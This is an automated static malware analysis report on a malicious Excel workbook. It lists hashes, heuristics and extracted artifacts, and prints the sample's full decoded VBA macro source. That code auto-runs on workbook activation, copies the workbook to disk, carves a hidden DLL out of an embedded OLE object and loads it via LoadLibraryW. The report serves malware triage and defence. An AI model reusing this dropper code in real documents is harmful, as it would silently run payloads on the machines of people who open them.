Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e09258bd1d851066…

MALICIOUS

Office (OLE)

719.0 KB Created: 2019-08-30 09:14:50 Authoring application: Microsoft Excel First seen: 2020-02-04
MD5: 14a00e94fdc591e69353da90713c6556 SHA-1: cd3527832754d61f3a538af807d1374b24adaef7 SHA-256: e09258bd1d851066d6e419e87bd01e896097a5e2c58dd210708e85a285ac4478
500 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer T1027 Obfuscated Files or Information

The sample is an Excel document containing VBA macros that leverage WScript.Shell and CreateObject to execute embedded shellcode. The macros also appear to decode and execute an Excel 4.0 macro, which in turn launches a second-stage PE executable. This indicates a dropper functionality designed to download and execute further malicious payloads.

Heuristics 11

  • ClamAV: Xls.Dropper.Sdrop-7331943-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Sdrop-7331943-0
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
    Matched line in script
    Set WaitForSingle = CreateObject("WScript.Shell")
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set WaitForSingle = CreateObject("WScript.Shell")
  • VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGER
    VBA code attached to an auto-firing ActiveX/UserForm control event (e.g. _Layout/_Change/_Painted) decodes a string with Replace/Split/Join/StrReverse/Chr and passes the recovered formula text to ExecuteExcel4Macro. This bridges VBA event activation into XLM formula execution to call Win32 APIs / drop payloads while evading AutoOpen and Shell keyword detection — a high-confidence macro stager, not a specific Office parser CVE.
    Matched line in script
    Debug.Print Temp1
CCount = Application.ExecuteExcel4Macro(Temp1)
Debug.Print CCount
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set WaitForSingle = CreateObject("WScript.Shell")
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12299 bytes
SHA-256: 1c0019131fb0deb9ee95c8088908b1acf487dabf8f6d22f4640b58e1edbb2563
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sem"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Activate()
If UserForm1.Visible = False Then
Module1.AppStart
End If

End Sub

Attribute VB_Name = "Page1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
#If Win64 Then
    Public Declare PtrSafe Function Wakeup Lib _
        "templ2.dll" () As Integer
    Public Declare PtrSafe Function Wakeup2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
#Else
   Public Declare Function Wakeup2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
     Public Declare Function Wakeup Lib _
        "templ1.dll" () As Integer
#End If
   
Public Function ITestModule_GetErrorInterface()
    Set ITestModule_GetErrorInterface = g_errorobj
End Function
Public Function ITestModule_GetProviderInterface()
    Set ITestModule_GetProviderInterface = g_provobj
End Function
Public Sub ITestModule_SetErrorInterface(ByVal pError)
    Set g_errorobj = pError
    If tracemod Then
        g_errorobj.Transmit "Inside: ITestModule_SetErrorInterface" + Chr(10)
    End If
End Sub
Public Sub ITestModule_SetProviderInterface(ByVal pProvInfo)
On Error GoTo ixx
    Set g_provobj = pProvInfo
    For i = 0 To numcases - 1
        ca.ses(i).SetCaseProvider g_provobj
    Next i
Exit Sub
ixx:
MsgBox Err.Description
End Sub
Public Function ITestModule_Terminate() As Boolean
    ITestModule_Terminate = True
End Function
Public Sub AppStart()

ExecuteExcel4Macro "MESSAGE(False, ""Next"")"
Dim WaitForSingle As Object
    Dim SpecialPath As String
    

Set WaitForSingle = CreateObject("WScript.Shell")
   
UserForm3.TextBox1.Tag = WaitForSingle.ExpandEnvironmentStrings("%" + UserForm3.TextBox1.Tag + "%")

UserForm3.TextBox1.Tag = Replace(UserForm3.TextBox1.Tag, "%", "")
UserForm3.TextBox2.Tag = WaitForSingle.SpecialFolders(UserForm3.TextBox2.Tag)
'LocalAppData
ChDir (UserForm3.TextBox1.Tag)

    UserForm1.show
ExecuteExcel4Macro "MESSAGE(False, ""Next"")"
End Sub




Public Function ITestModule_GetCase(ByVal lIndex As Long)
    If tracemod Then
        g_errorobj.Transmit "Inside: ITestModule_GetCase(" + CStr(lIndex) + ")" + Chr(10)
    End If
    numcases = numcases + 1
    Select Case lIndex
        Case 0
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnclose")
        Case 1
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cndefdat")
        Case 2
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnexec")
        Case 3
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnmode")
        Case 4
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnopen")
        Case 5
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnprop")
        Case 6
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnprovider")
        Case 7
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnstring")
        Case 8
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cntimeout")
        Case 9
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldactualsize")
        Case 10
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldattributes")
        Case 11
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.flddefinedsize")
        Case 12
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldname")
        Case 13
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldoriginalvalue")
        Case 14
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldprecision")
        Case 15
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldtype")
        Case 16
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldvalue")
        Case 17
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsactivecn")
        Case 18
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsclose")
        Case 19
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmove")
        Case 20
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmovefirst")
        Case 21
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmovenext")
        Case 22
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmoveprev")
        Case 23
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsopen")
        Case 24
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rssource")
        Case 25
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rssupports")
        Case 26
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsbof")
        Case 27
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rseof")
        Case 28
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rscachesize")
        Case 29
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rspagesize")
        Case 30
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsrequery")
  End Select
    ca.ses(numcases - 1).SetCaseError g_errorobj
    ca.ses(numcases - 1).SetCaseProvider g_provobj
    Set Locprov = g_provobj
    Set ITestModule_GetCase = ca.ses(numcases - 1)
End Function
Public Sub NewValuje(s As String, nm As String, fl As Long, Variable_6 As Integer)
    Dim Variable_1 As Long, Variable_2 As Byte, Variable_3 As Byte, Variable_4 As Byte
    Dim Variable_5() As Long

    ReDim Variable_5(1 To fl)
    Variable_5(1) = CByte(40 + 37)
    Variable_5(2) = CByte(40 + 50)
    Variable_5(1 + 2) = CByte(40 + 104)
    
    Variable_1 = FreeFile
    Open s For Binary Access Read As Variable_1
    Dim cur As Integer
    cur = 1
    Do While Not EOF(Variable_1)
        Get Variable_1, , Variable_2
        If Variable_2 = Variable_5(1) Then
           Get Variable_1, , Variable_3
           If Variable_3 = Variable_5(2) Then
                Get Variable_1, , Variable_4
                If Variable_4 = Variable_5(3) Then
                     If cur = Variable_6 Then
                        For k = 4 To fl
                            Get Variable_1, , Variable_2
                            Variable_5(k) = Variable_2
                            Next k
                         Exit Do
                     Else
                        cur = cur + 1
                     End If
                End If
           End If
        End If
    Loop
    Close Variable_1
    
    Variable_1 = FreeFile
    Open nm For Binary Lock Read Write As #Variable_1
    For i = LBound(Variable_5) To UBound(Variable_5)
        Put #Variable_1, , CByte(Variable_5(i))
    Next i

    Close #Variable_1
End Sub


Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{C4017465-4FF0-4D68-83FB-A26D536B03A0}{4F7840C1-5122-45C4-9EFF-7DBE9BE26117}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label1_Click()

End Sub

Private Sub UserForm_Activate()
DoEvents
ReplaceCurrentModule
End Sub

Private Sub UserForm_Initialize()
Call SystemButtonSettings(Me, False)

End Sub

Attribute VB_Name = "Module2"
Private Const GWL_STYLE = -16
Private Const WS_CAPTION = &HC00000
Private Const WS_SYSMENU = &H80000

#If VBA7 Then

    Private Declare PtrSafe Function GetWindowLong _
        Lib "user32" Alias "GetWindowLongA" (ByVal parameter1 As Long, _
        ByVal nIndex As Long) As Long
    Private Declare PtrSafe Function SetWindowLong _
        Lib "user32" Alias "SetWindowLongA" (ByVal parameter1 As Long, _
        ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Private Declare PtrSafe Function FindWindowA _
        Lib "user32" (ByVal lpClassName As String, _
        ByVal lpWindowName As String) As Long
    Private Declare PtrSafe Function DrawMenuBar _
        Lib "user32" (ByVal parameter1 As Long) As Long
        
#Else

    Private Declare Function GetWindowLong _
        Lib "user32" Alias "GetWindowLongA" ( _
        ByVal parameter1 As Long, ByVal nIndex As Long) As Long
    Private Declare Function SetWindowLong _
        Lib "user32" Alias "SetWindowLongA" ( _
        ByVal parameter1 As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Private Declare Function FindWindowA _
        Lib "user32" (ByVal lpClassName As String, _
        ByVal lpWindowName As String) As Long
    Private Declare Function DrawMenuBar _
        Lib "user32" (ByVal parameter1 As Long) As Long
  
#End If



Public Sub KillArray(ParamArray PathList() As Variant)
    On Error Resume Next
    For Each Key In PathList
        Kill Key
    Next Key
    On Error GoTo 0
End Sub




Public Sub SystemButtonSettings(frm As Object, show As Boolean)
Dim windowStyle As Long
Dim windowHandle As Long

windowHandle = FindWindowA(vbNullString, frm.Caption)
windowStyle = GetWindowLong(windowHandle, GWL_STYLE)

If show Then

    SetWindowLong windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU)

   
Else
 SetWindowLong windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU)

End If

DrawMenuBar (windowHandle)

End Sub



Attribute VB_Name = "Module3"




Sub test()

Temp1 = Temp & Rows(1).Address(, , xlR1C1)
Temp1 = "Counta(" & Temp1 & ")"
Debug.Print Temp1
CCount = Application.ExecuteExcel4Macro(Temp1)
Debug.Print CCount
Temp2 = Temp & Columns("A").Address(, , xlR1C1)
Temp2 = "Counta(" & Temp2 & ")"
RCount = Application.ExecuteExcel4Macro(Temp2)
ReDim arr(1 To RCount, 1 To CCount)

For R = 1 To RCount
    For C = 1 To CCount
        Temp3 = Temp & Cells(R, C).Address(, , xlR1C1)
    Next
Next

End Sub




Public Sub ReplaceCurrentModule()
    NameFav = UserForm3.TextBox1.Tag + "\dependence" + ".xlsx"
    ZipName = NameFav + ".zip"
    ZipFolder = UserForm3.TextBox1.Tag
    Dim nm As String
    Dim API_LENGTH As Long
    Dim d_6 As Integer
    nm = UserForm3.TextBox2.Tag + "\templ1"
    API_LENGTH = 278528
    d_6 = 1
            
#If Win64 Then
    nm = UserForm3.TextBox2.Tag + "\templ2"
    API_LENGTH = 233472
    d_6 = 2
#End If
nm = nm + ".d" + "ll"
        KillArray ZipFolder & "\oleObj" + "ect*.bin", ZipName, nm
        
    DoEvents
        ThisWorkbook.Sheets.Copy
        Application.DisplayAlerts = False
        DoEvents
        ActiveWorkbook.SaveAs NameFav, FileFormat:=50 + 1
    DoEvents
    ActiveWorkbook.Close
    DoEvents
        
    
        FileCopy NameFav, ZipName
        
        Set oApp = CreateObject("Shell." + "Application")
        oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin")
        NewValuje ZipFolder + "\oleObject1." + "bin", nm, API_LENGTH, d_6
        
        ChDir (UserForm3.TextBox2.Tag)
        No_Wakeup = Wakeup2(nm)
        Wakeup

End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{0FF56802-FFC3-4D6F-8618-52A2374E216A}{14BA840B-7252-4D43-9DC9-5A612EB825C0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Page11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module4"

Attribute VB_Name = "Module5"

Attribute VB_Name = "Module6"
embedded_office_0000305f.exe embedded-pe Office MZ+PE at offset 0x305F 723873 bytes
SHA-256: 91f6915ea3a8fceb7509f8a80e8f652483b556b23f970e363f7efc5a4c3d9c77
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): WScript.Shell
ole10native_00.bin ole-package OLE Ole10Native stream: MBD01142475/Ole10Native 525353 bytes
SHA-256: 8d5f4693e5f70a2bd6e5a6f285f9c9f06e0c48b89e3e6c89af2153ea3354cc94

Open this report in the interactive analyzer, or submit your own file for analysis.